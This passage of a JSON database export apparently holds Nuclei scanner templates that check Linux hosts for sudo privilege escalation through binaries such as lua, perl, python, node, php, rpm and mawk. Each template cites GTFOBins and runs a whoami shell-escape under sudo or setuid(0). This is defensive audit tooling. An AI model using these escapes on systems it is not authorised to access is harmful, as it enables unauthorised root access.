lftp is known for its reliability and scriptability, making it a popular choice for automated file transfer tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/lftp/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,lftp,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n lftp -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo lftp -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a004630440220462cec07ea103fea931c8907e3c7ed09157109f08fac37e1c568ba71dedce6b602200279b85c4e3358fee401e7f4e3e7c655dccc0b5dcdec50007c11de56f2362612:922c64590222798bb761d5b6d8e72950", "hash": "81e486f2acc1fe2d2b94c85a4ef7adfa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4e" }, "name": "privesc-ltrace.yaml", "content": "id: privesc-ltrace\n\ninfo:\n name: ltrace - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. 
It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.\n reference:\n - https://gtfobins.github.io/gtfobins/ltrace/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ltrace,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ltrace -b -L whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ltrace -b -L whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100f11ea8058ebe8897f65ca06d6405192f055f3b89df0d17241169b6a03b67e64e0221008fd51a442385bf5ff02bb50c6c79399067a111e382deb244cd0cc5dce10bc476:922c64590222798bb761d5b6d8e72950", "hash": "f0859fe03f44d79c9c07412a13fbd5b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4f" }, "name": "privesc-lua.yaml", "content": "id: privesc-lua\n\ninfo:\n name: lua - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Lua is a powerful, efficient, lightweight, embeddable scripting language. It is often used as a scripting language for game development and other applications that require a customizable and extensible scripting interface. 
Lua is known for its simplicity, speed, and ease of integration with other languages and systems.\n reference:\n - https://gtfobins.github.io/gtfobins/lua/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,lua,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n lua -e 'os.execute(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo lua -e 'os.execute(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950", "hash": "1c7d86319b0c016d00f3730a59b1a0cd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c50" }, "name": "privesc-mawk.yaml", "content": "id: privesc-mawk\n\ninfo:\n name: mawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. 
mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/mawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,mawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n mawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo mawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502200df72b2069096e548940fff30c33212d8fb9d02c2ca03323f5d7bbee8e35287a022100f1f693cd49803f304a8b40d5e633bbbeb5f9e58ded1142fbe9959879e2dd6a2d:922c64590222798bb761d5b6d8e72950", "hash": "41dedc13dc4c313f0a3993ae09f13572", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c51" }, "name": "privesc-multitime.yaml", "content": "id: privesc-multitime\n\ninfo:\n name: Multitime - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n multitime is a command-line utility that allows for the timing and execution of commands multiple times. 
It is often used for benchmarking and performance testing of commands and scripts, providing a convenient way to measure the execution time of a given task.\n reference:\n - https://gtfobins.github.io/gtfobins/multitime/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,multitime,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n multitime whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo multitime whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c399cac22f29d39aa0a2894a998683589976aba3c286799d652b025e66442906022100b48b165b549c4e7a671efc02cccc66b8207eb424e817090713c2e4a4ed1bacec:922c64590222798bb761d5b6d8e72950", "hash": "ba24cf72814ebccf0b476e68778c0c91", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c52" }, "name": "privesc-mysql.yaml", "content": "id: privesc-mysql\n\ninfo:\n name: MySQL - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for managing and manipulating data. It is widely used for web applications and is known for its reliability, ease of use, and performance. MySQL is a popular choice for database-driven applications and is supported on various platforms.\n reference:\n - https://gtfobins.github.io/gtfobins/mysql/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,mysql,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n mysql -e '\\! whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo mysql -e '\\! 
whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950", "hash": "f7356f6df9a399ee92ca9fd28b9b78c6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c53" }, "name": "privesc-nawk.yaml", "content": "id: privesc-nawk\n\ninfo:\n name: nawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n nawk is an implementation of the AWK programming language. It is a text-processing language that is commonly used for pattern scanning and processing of text files. nawk provides powerful features for data extraction, reporting, and manipulation, making it a valuable tool for text processing tasks in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/nawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo nawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402203a9652dc49b3c404e11cdd93d124f05d18e06dc8d66199c14ea83e0761ceeec002207922dc474bbc053a9a488fd0b912d99a77ab120527be55d4b64b01a2499a83e0:922c64590222798bb761d5b6d8e72950", "hash": "099866a2db68d07902d67c79ec6e75e4", "level": 5, "time": "2024-05-17 23:39:44" }, 
{ "_id": { "$oid": "66477a413521042ccf307c54" }, "name": "privesc-nice.yaml", "content": "id: privesc-nice\n\ninfo:\n name: Nice - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n In Unix-like operating systems, the nice command is used to execute a program with a modified scheduling priority. It allows users to start a process with a specified priority level, which can influence the allocation of CPU resources. This can be useful for managing system resources and controlling the impact of a process on system performance.\n reference:\n - https://gtfobins.github.io/gtfobins/nice/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nice,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nice whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo nice whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502204e1d35336c62b800e25524ed45bbbe4acca9c38c86cd8759c0332b2677e4559a0221008fd313e5d3acaafdf394ef3807440de278980f99511f2de4a579e11d09588a8a:922c64590222798bb761d5b6d8e72950", "hash": "66de34924a74d90417a8e453a534747e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c55" }, "name": "privesc-node.yaml", "content": "id: privesc-node\n\ninfo:\n name: Node - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. 
Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.\n reference:\n - https://gtfobins.github.io/gtfobins/node/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,node,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n node -e 'require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n - engine:\n - sh\n - bash\n source: |\n sudo node -e 'require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n - engine:\n - sh\n - bash\n source: |\n node -e 'process.setuid(0); require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950", "hash": "547d6e659fe20935c7b6ddd460e6211c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c56" }, "name": "privesc-nsenter.yaml", "content": "id: privesc-nsenter\n\ninfo:\n name: Nsenter - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n nsenter is a command-line utility in Linux that allows a user to enter into an existing namespace. It is commonly used for troubleshooting and managing namespaces in containerized environments. 
By using nsenter, users can enter into a specific namespace and execute commands within that namespace, which can be helpful for various system administration tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/nsenter/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nsenter,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nsenter whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo nsenter whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008bd4125fd80c48fa98d3c5ccb0b0a5ed44c771a6b53ff6b496c9e15836ba48c5022100a2aa9667f4688e889be09561ede2e6bfe414b25f107aee2f3370d5e34abfd1e4:922c64590222798bb761d5b6d8e72950", "hash": "d1796b1e83f9ec0643c7886e9997731f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c57" }, "name": "privesc-perl.yaml", "content": "id: privesc-perl\n\ninfo:\n name: Perl - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. 
Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/perl/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,perl,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n perl -e 'exec \"whoami\";'\n\n - engine:\n - sh\n - bash\n source: |\n sudo perl -e 'exec \"whoami\";'\n\n - engine:\n - sh\n - bash\n source: |\n perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"whoami\";'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100dee9666c916f48b5deeb7004464798e74b6e1c3246e25d6131aa863fc6371435022100bf2eb4cbde6f6caacd93dfe536844a03f99b5984d8dcfeba78f5b8623dadaf58:922c64590222798bb761d5b6d8e72950", "hash": "19573883cc88f0deb03375046a342be3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c58" }, "name": "privesc-pexec.yaml", "content": "id: privesc-pexec\n\ninfo:\n name: pexec - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The term \"pexec\" typically refers to the \"privileged execution\" of a command or program.\n reference: |\n https://gtfobins.github.io/gtfobins/pexec/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,pexec,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n pexec whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo pexec whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: 
dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ffd73bbffb6b8f255e4ff49596ec507fa0fad10e1860aebf788009fa3ec362700220789321e46690714047244d7c81ba5e4114f3bc1e6a2e6c8c9ac45182b5feeede:922c64590222798bb761d5b6d8e72950", "hash": "4a83b78e8f6c361cff6ad6d9dbfbd22c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c59" }, "name": "privesc-php.yaml", "content": "id: privesc-php\n\ninfo:\n name: PHP - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n PHP is a popular server-side scripting language that is widely used for web development. It is known for its ease of use, flexibility, and broad support for web frameworks and content management systems. PHP is commonly used to create dynamic web pages, process form data, manage sessions, and interact with databases.\n reference:\n - https://gtfobins.github.io/gtfobins/php/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,php,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n php -r 'system(\"whoami\");'\n\n - engine:\n - sh\n - bash\n source: |\n sudo php -r 'system(\"whoami\");'\n\n - engine:\n - sh\n - bash\n source: |\n php -r \"posix_setuid(0); system(\"whoami\");\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502204dea2deccea922ff402d0898f4f4a3ca9044ff4b156bcdb80782ccbd05471597022100ecc5ce20f2433825d62d6abd9ac88e44ebe050d8a7832cfdbd54d850ab3357f4:922c64590222798bb761d5b6d8e72950", "hash": "996b205aa449d0342866d1ca19ab0c49", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5a" 
}, "name": "privesc-posh.yaml", "content": "id: privesc-posh\n\ninfo:\n name: posh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n \"posh\" typically refers to the \"Policy-compliant Ordinary SHell,\" which is a restricted shell designed to provide a limited set of commands and features for users with restricted access. It is often used in environments where users require limited functionality and access to system resources.\n reference:\n - https://gtfobins.github.io/gtfobins/posh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,posh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n posh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo posh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100b3a4f4aaf0ece3b42f474a0a1715a494b1d5df6afece578ab59e6a362c3819c2022100ec82fdef145ace5edaeb1d7f603d674423509053a71415bfd189b2628bfd419d:922c64590222798bb761d5b6d8e72950", "hash": "a93784df413006df3393966746965912", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5b" }, "name": "privesc-python.yaml", "content": "id: privesc-python\n\ninfo:\n name: Python - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Python is a high-level, general-purpose programming language known for its readability and simplicity. It is widely used for web development, scientific computing, artificial intelligence, and system automation. 
Python's versatility, extensive standard library, and large community make it a popular choice for a wide range of applications.\n reference:\n - https://gtfobins.github.io/gtfobins/python/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,php,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n python -c 'import os; os.system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo python -c 'import os; os.system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n python -c 'import os; os.setuid(0); os.system(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022042e3fab21f07a128fb933363cb4ba5a35ecab9338b906ac0404c149fa6d14384022100e8bfb2f3450a973d8926379260d5b9ea8254fb079eb27f64528850628716bd40:922c64590222798bb761d5b6d8e72950", "hash": "e16facd3370b1f0c4c708fb606c6d218", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5c" }, "name": "privesc-rake.yaml", "content": "id: privesc-rake\n\ninfo:\n name: Rake - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. 
Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.\n reference:\n - https://gtfobins.github.io/gtfobins/rake/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rake,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rake -p '`whoami 1>&0`'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rake -p '`whoami 1>&0`'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100bcc90916fbc2d8890295da859b0fecac95786566b6f62f7fbc80af89a234f691022035104e4e99936ec941983b0706403cad8de163e482d76b90a7c093889da4e618:922c64590222798bb761d5b6d8e72950", "hash": "4e5b5ecff7ef57792fccdb3b7424a99d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5d" }, "name": "privesc-rc.yaml", "content": "id: privesc-rc\n\ninfo:\n name: RC - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The rc command is a shell command interpreter that is used to execute commands and scripts. 
It is commonly used for scripting and automation tasks, and it provides a set of built-in commands and features for interacting with the system.\n reference:\n - https://gtfobins.github.io/gtfobins/rc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rc -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rc -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950", "hash": "654990a801baf49c8579d913d89ac2a1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5e" }, "name": "privesc-rlwrap.yaml", "content": "id: privesc-rlwrap\n\ninfo:\n name: rlwrap - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n rlwrap is a utility that provides readline functionality to commands that lack it, allowing for command-line editing and history capabilities. 
It is commonly used to enhance the user experience when working with command-line tools that do not have built-in readline support.\n reference:\n - https://gtfobins.github.io/gtfobins/rlwrap/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rlwrap,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rlwrap whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo rlwrap whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100dab7e9bf7b1719b4301f98a31f949b85357909fe334d985657b0ca00021c4fd2022012ece57975d17e4c936529044eb28802484f3d6774f16a6b10c0e1c68d46fa66:922c64590222798bb761d5b6d8e72950", "hash": "79e933179f297a6c12a70cc59a329e9b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5f" }, "name": "privesc-rpm.yaml", "content": "id: privesc-rpm\n\ninfo:\n name: rpm - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n rpm stands for \"Red Hat Package Manager.\" It is a command-line package management utility used in Red Hat-based Linux distributions to install, update, and manage software packages. 
rpm is also used to query package information, verify package integrity, and perform various administrative tasks related to software packages.\n reference:\n - https://gtfobins.github.io/gtfobins/rpm/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpm,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpm --pipe 'whoami 0<&1'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpm --pipe 'whoami 0<&1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100f9ebcba2d19a4526e7f5e57c7f6689b357d2c494430888e101be24cfc76be06402205cb441dcdec04e9db9d615c66db8e622566f28ac363ca56cf663e53e0b37a139:922c64590222798bb761d5b6d8e72950", "hash": "ef085462bcf51977f12db52a63ade3b5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c60" }, "name": "privesc-rpmdb.yaml", "content": "id: privesc-rpmdb\n\ninfo:\n name: rpmdb - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The rpmdb is the database used by the RPM Package Manager to store metadata about installed packages on a Linux system. It is used to track information about installed packages, including their files, dependencies, and other attributes. 
The rpmdb is a critical component of package management on RPM-based Linux distributions.\n reference:\n - https://gtfobins.github.io/gtfobins/rpmdb/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpmdb,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpmdb --eval '%(whoami 1>&2)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpmdb --eval '%(whoami 1>&2)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221009502409087b740c10114c535f7abd42452ac96396a499f4077ab39d10ddaeea5022100da28fa2b0501c790c92d5ed0e6099f9b9fe0d244cba2d0872422816b67d58e8c:922c64590222798bb761d5b6d8e72950", "hash": "88d4f2953361c6788d09c36df21408c8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c61" }, "name": "privesc-rpmverify.yaml", "content": "id: privesc-rpmverify\n\ninfo:\n name: rpmverify - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The rpmverify command is used to verify the integrity and authenticity of installed RPM packages on a Linux system. It checks the files in the installed packages against the information stored in the RPM database to detect any modifications or discrepancies. 
This helps ensure the security and stability of the system by identifying any unauthorized changes to the installed packages.\n reference:\n - https://gtfobins.github.io/gtfobins/rpmverify/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpmverify,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpmverify --eval '%(whoami 1>&2)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpmverify --eval '%(whoami 1>&2)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502203fe3d7509151bc933a63ac20e2602cb1d62735696175b3eb299ea765d5c444d6022100a14058c9b7bcaab524cc9ceb95ca35be80bd2d0b16b4ab902cadbce169734d9a:922c64590222798bb761d5b6d8e72950", "hash": "3e11ebd72d050f1de4746ec871cccb0c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c62" }, "name": "privesc-ruby.yaml", "content": "id: privesc-ruby\n\ninfo:\n name: Ruby - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. 
Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.\n reference:\n - https://gtfobins.github.io/gtfobins/ruby/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,ruby,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ruby -e 'exec \"whoami\"'\n\n - engine:\n - sh\n - bash\n source: |\n sudo ruby -e 'exec \"whoami\"'\n\n - engine:\n - sh\n - bash\n source: |\n ruby -e 'Process::Sys.setuid(0); exec \"whoami\"'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100bbc6742bc67c075cd2c8607c45ea1ff15ea6427a25a7d6dee8d78743473c0273022100df262f72fa5cffad8d2e1340fffe33e1a58b8bbb5697a8360ca082760d5c5924:922c64590222798bb761d5b6d8e72950", "hash": "74f1bf0e0a417357626bfa6f5fdb5eaa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c63" }, "name": "privesc-run-parts.yaml", "content": "id: 